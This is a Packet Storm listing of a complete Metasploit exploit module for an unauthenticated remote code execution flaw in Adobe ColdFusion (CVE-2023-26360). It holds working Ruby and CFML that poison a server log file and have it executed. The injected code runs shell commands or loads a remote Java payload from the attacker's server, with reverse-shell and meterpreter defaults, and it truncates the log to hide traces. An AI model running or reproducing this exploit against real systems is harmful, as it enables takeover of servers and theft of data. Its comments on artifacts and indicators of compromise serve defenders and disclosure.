packetstorm — sf, metasploit.com — PACKETSTORM:172079
History: May 01, 2023 - 12:00 a.m.

Adobe ColdFusion Unauthenticated Remote Code Execution

2023-05-01 00:00:00
sf, metasploit.com
packetstormsecurity.com
642

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.4 Medium

EPSS

Percentile

96.7%

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
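class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::CmdStager

  # Module metadata and datastore options.
  #
  # The 'Notes' section is the defender-facing part of this block: it lists the
  # on-disk artifacts (compiled CFML class under WEB-INF/cfclasses, dropper
  # files) and the ColdFusion log files that will carry indicators after a run.
  #
  # @param info [Hash] module info merged into the framework defaults by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe ColdFusion Unauthenticated Remote Code Execution',
        'Description' => %q{
          This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe
          ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in
          order to gain remote code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sf', # MSF Exploit & Rapid7 Analysis
        ],
        'References' => [
          ['CVE', '2023-26360'],
          ['URL', 'https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis']
        ],
        'DisclosureDate' => '2023-03-14',
        'Platform' => %w[java win linux unix],
        'Arch' => [ARCH_JAVA, ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true, # Code execution as 'NT AUTHORITY\SYSTEM' on Windows and 'nobody' on Linux.
        'WfsDelay' => 30,
        'Targets' => [
          [
            'Generic Java',
            {
              'Type' => :java,
              'Platform' => 'java',
              'Arch' => [ARCH_JAVA],
              'DefaultOptions' => {
                'PAYLOAD' => 'java/meterpreter/reverse_tcp'
              }
            },
          ],
          [
            'Windows Command',
            {
              'Type' => :cmd,
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            },
          ],
          [
            'Windows Dropper',
            {
              'Type' => :dropper,
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'CmdStagerFlavor' => ['certutil', 'psh_invokewebrequest'],
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Unix Command',
            {
              'Type' => :cmd,
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_perl'
              }
            },
          ],
          [
            'Linux Dropper',
            {
              'Type' => :dropper,
              'Platform' => 'linux',
              'Arch' => [ARCH_X64],
              'CmdStagerFlavor' => ['curl', 'wget', 'bourne', 'printf'],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [
            # The following artifacts will be left on disk:
            # The compiled CFML class generated from the poisoned coldfusion-out.log (Note: the hash number will vary)
            # * Windows: C:\ColdFusion2021\cfusion\wwwroot\WEB-INF\cfclasses\cfcoldfusion2dout2elog376354580.class
            # * Linux: /opt/ColdFusion2021/cfusion/wwwroot/WEB-INF/cfclasses/cfcoldfusion2dout2elog181815836.class
            # If a dropper payload was used, a file with a random name may be left.
            # * Windows: C:\Windows\Temp\XXXXXX.exe
            # * Linux: /tmp/XXXXXX
            ARTIFACTS_ON_DISK,
            # The following logs will contain IOCs:
            # C:\ColdFusion2021\cfusion\logs\coldfusion-out.log
            # C:\ColdFusion2021\cfusion\logs\exception.log
            # C:\ColdFusion2021\cfusion\logs\application.log
            IOC_IN_LOGS
          ],
          'RelatedModules' => [
            'auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360'
          ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8500),
        OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),
        OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']),
        OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log'])
      ]
    )
  end

  # Fingerprint the target by looking for ColdFusion session cookies on a GET /.
  #
  # No generic version probe is available, so the result is at best Detected.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the request fails or no
  #   ColdFusion cookie is seen, Detected otherwise
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/'
    )

    return CheckCode::Unknown('Connection failed') unless res

    # We cannot identify the ColdFusion version through a generic technique. Instead we use the Recog fingerprint
    # to match a ColdFusion cookie, and use this information to detect ColdFusion as being present.
    # https://github.com/rapid7/recog/blob/main/xml/http_cookies.xml#L69
    #
    # The dot in `\.cfusion` is escaped so that alternative matches the literal cookie fragment ".cfusion"
    # rather than any character followed by "cfusion" (the unescaped form over-matched).
    cookies = res.get_cookies.to_s
    if cookies.match?(/(CFCLIENT_[^=]+|CFGLOBALS|CFID|CFTOKEN)=|\.cfusion/)
      return CheckCode::Detected('ColdFusion detected but version number is unknown.')
    end

    CheckCode::Unknown
  end

  # Dispatch on the selected target type.
  #
  # :java serves the payload from this module's HTTP server, :cmd runs the
  # encoded command payload, :dropper goes through the CmdStager mixin.
  #
  # @raise [Msf::Exploit::Failed] BadConfig when CFC_ENDPOINT is not a .cfc path
  def exploit
    unless datastore['CFC_ENDPOINT'].end_with?('.cfc')
      fail_with(Failure::BadConfig, 'The CFC_ENDPOINT must point to a .cfc file')
    end

    case target['Type']
    when :java
      # Start the HTTP server
      start_service

      # Trigger a loadClass request via java.net.URLClassLoader
      trigger_urlclassloader

      # Handle the payload...
      handler
    when :cmd
      execute_command(payload.encoded)
    when :dropper
      execute_cmdstager
    end
  end

  # HTTP server callback: for the :java target, answer any request with the
  # encoded payload as a JAR; every other target defers to the mixin.
  #
  # @param cli [Rex::Proto::Http::ServerClient] the connecting client
  # @param _req [Rex::Proto::Http::Request] the request (unused)
  def on_request_uri(cli, _req)
    if target['Type'] == :java
      print_status('Received payload request, transmitting payload jar...')

      send_response(cli, payload.encoded, {
        'Content-Type' => 'application/java-archive',
        'Connection' => 'close',
        'Pragma' => 'no-cache'
      })
    else
      super
    end
  end

  # Build and run the CFML for the :java target: a URLClassLoader pointed at
  # this module's HTTP server, which loads metasploit.Payload from there.
  #
  # Randomised CFML variable names are used throughout, so the exact text
  # written to the log differs per run; the createObject('java', ...) calls
  # are the stable part of the artifact.
  def trigger_urlclassloader
    # Here we construct a CFML payload to load a Java payload via URLClassLoader.

    # NOTE: If our URL ends with / a XXX.class is loaded, if no trailing slash then a JAR is expected to be returned.

    cf_url = Rex::Text.rand_text_alpha_lower(4)

    srvhost = datastore['SRVHOST']

    # Ensure SRVHOST is a routable IP address to our RHOST.
    if Rex::Socket.addr_atoi(srvhost) == 0
      srvhost = Rex::Socket.source_address(rhost)
    end

    # Create a URL pointing back to our HTTP server.
    cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>"

    cf_reflectarray = Rex::Text.rand_text_alpha_lower(4)

    # Get a reference to java.lang.reflect.Array so we can create a URL[] instance.
    cfc_payload << "<cfset #{cf_reflectarray} = createObject('java','java.lang.reflect.Array')/>"

    cf_array = Rex::Text.rand_text_alpha_lower(4)

    # Create a URL[1] instance.
    cfc_payload << "<cfset #{cf_array} = #{cf_reflectarray}.newInstance(#{cf_url}.getClass(),1)/>"

    # Set the first element in the array to our URL.
    cfc_payload << "<cfset #{cf_reflectarray}.set(#{cf_array},0,#{cf_url})/>"

    cf_loader = Rex::Text.rand_text_alpha_lower(4)

    # Create a URLClassLoader instance.
    cfc_payload << "<cfset #{cf_loader} = createObject('java','java.net.URLClassLoader').init(#{cf_array},javaCast('null',''))/>"

    # Load the remote JAR file and instantiate an instance of metasploit.Payload.
    cfc_payload << "<cfset #{cf_loader}.loadClass('metasploit.Payload').newInstance().main(javaCast('null',''))/>"

    execute_cfml(cfc_payload)
  end

  # Build and run the CFML for the :cmd and :dropper targets.
  #
  # The command itself is not embedded in the CFML; it travels as a form
  # parameter (cf_param) on the second request made by execute_cfml and is
  # read back via form.<cf_param>. Only the win/unix/linux targets declared
  # in initialize reach this method, so shell_name/shell_arg are always set.
  #
  # @param cmd [String] the command to run on the target
  # @param _opts [Hash] CmdStager options (unused)
  def execute_command(cmd, _opts = {})
    cf_param = Rex::Text.rand_text_alpha_lower(4)

    # If the cf_param is present in the HTTP requests www-form encoded data then proceed with the child tags.
    cfc_payload = "<cfif IsDefined('form.#{cf_param}') is 'True'>"

    # Set our cf_param with the data in the requests form data, this is the command to run.
    cfc_payload << "<cfset #{cf_param}=form.#{cf_param}/>"

    # Here we construct a CFML payload to stage the :cmd and :dropper commands...
    shell_name = nil
    shell_arg = nil

    case target['Platform']
    when 'win'
      shell_name = 'cmd.exe'
      shell_arg = '/C'
    when 'linux', 'unix'
      shell_name = '/bin/sh'
      shell_arg = '-c'
    end

    cf_array = Rex::Text.rand_text_alpha_lower(4)

    # Create an array of arguments to pass to exec()
    cfc_payload << "<cfset #{cf_array}=['#{shell_name}','#{shell_arg}',#{cf_param}]/>"

    cf_runtime = Rex::Text.rand_text_alpha_lower(4)

    # Get a reference to the java.lang.Runtime class.
    cfc_payload << "<cfobject action='create' type='java' class='java.lang.Runtime' name='#{cf_runtime}'/>"

    # Call the static Runtime.exec method to execute our string array holding the command and the arguments.
    cfc_payload << "<cfset #{cf_runtime}.getRuntime().exec(#{cf_array})/>"

    # The end of the If tag.
    cfc_payload << '</cfif>'

    execute_cfml(cfc_payload, cf_param, cmd)
  end

  # Wrap the given CFML in cftry/cffinally, plant it in CF_LOGFILE via the
  # first POST, then have the second POST compile and run the log file as a
  # template through the _metadata classname handling.
  #
  # Observable behaviour, from the defender's side: both POSTs go to
  # CFC_ENDPOINT with `_cfclient=true` and a `_variables` form field, both are
  # expected to answer 200 with an "<title>Error</title>" body, and the
  # cffinally block overwrites CF_LOGFILE with empty content — a log file that
  # is suddenly truncated is itself a signal.
  #
  # @param cfml [String] CFML to execute
  # @param param [String, nil] form parameter name carrying extra data
  # @param param_data [String, nil] value for that form parameter
  # @raise [Msf::Exploit::Failed] BadConfig when the wrapped CFML exceeds the
  #   log line limit, UnexpectedReply when either request does not answer as expected
  def execute_cfml(cfml, param = nil, param_data = nil)
    cfc_payload = '<cftry>'

    cfc_payload << cfml

    cfc_payload << "<cfcatch type='any'>"

    cfc_payload << '</cfcatch>'

    cfc_payload << '<cffinally>'

    # Clear the CF_LOGFILE which will contain this CFML code. We need to do this so we can repeatedly execute commands.
    # GetCurrentTemplatePath returns 'C:\ColdFusion2021\cfusion\wwwroot\..\logs\coldfusion-out.log' as this is the
    # template we are executing.
    cfc_payload << "<cffile action='write' file='#GetCurrentTemplatePath()#' output=''></cffile>"

    cfc_payload << '</cffinally>'

    cfc_payload << '</cftry>'

    # We can only log ~950 characters to a log file before the output is truncated, so we enforce a limit here.
    unless cfc_payload.length < 950
      fail_with(Failure::BadConfig, 'The CFC payload is too big to fit in the log file')
    end

    # We dont need to call a valid CFC method, so we just create a random method name to supply to the server.
    cfc_method = Rex::Text.rand_text_alpha_lower(1..8)

    # Perform the request that writes the cfc_payload to the CF_LOGFILE.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(datastore['CFC_ENDPOINT']),
      'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' },
      'vars_post' => { '_variables' => "{#{cfc_payload}" }
    )

    unless res && res.code == 200 && res.body.include?('<title>Error</title>')
      fail_with(Failure::UnexpectedReply, 'Failed to plant the payload in the ColdFusion output log file')
    end

    # The relative path from wwwroot to the CF_LOGFILE.
    cflog_file = datastore['CF_LOGFILE']

    # To construct the arbitrary file path from the attacker provided class name, we must insert 1 or 2 characters
    # to satisfy how coldfusion.runtime.JSONUtils.convertToTemplateProxy extracts the class name.
    if target['Platform'] == 'win'
      classname = "#{Rex::Text.rand_text_alphanumeric(1)}#{cflog_file.gsub('/', '\\')}"
    else
      classname = "#{Rex::Text.rand_text_alphanumeric(1)}/#{cflog_file}"
    end

    json_variables = "{\"_metadata\":{\"classname\":#{classname.to_json}},\"_variables\":[]}"

    vars_post = { '_variables' => json_variables }

    unless param.nil? || param_data.nil?
      vars_post[param] = param_data
    end

    # Perform the request that executes the CFML we wrote to the CF_LOGFILE, while passing the shell command to be
    # executed as a parameter which will in turn be read back out by the CFML in the cfc_payload.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(datastore['CFC_ENDPOINT']),
      'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' },
      'vars_post' => vars_post
    )

    unless res && res.code == 200 && res.body.include?('<title>Error</title>')
      fail_with(Failure::UnexpectedReply, 'Failed to execute the payload in the ColdFusion output log file')
    end
  end
end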
`
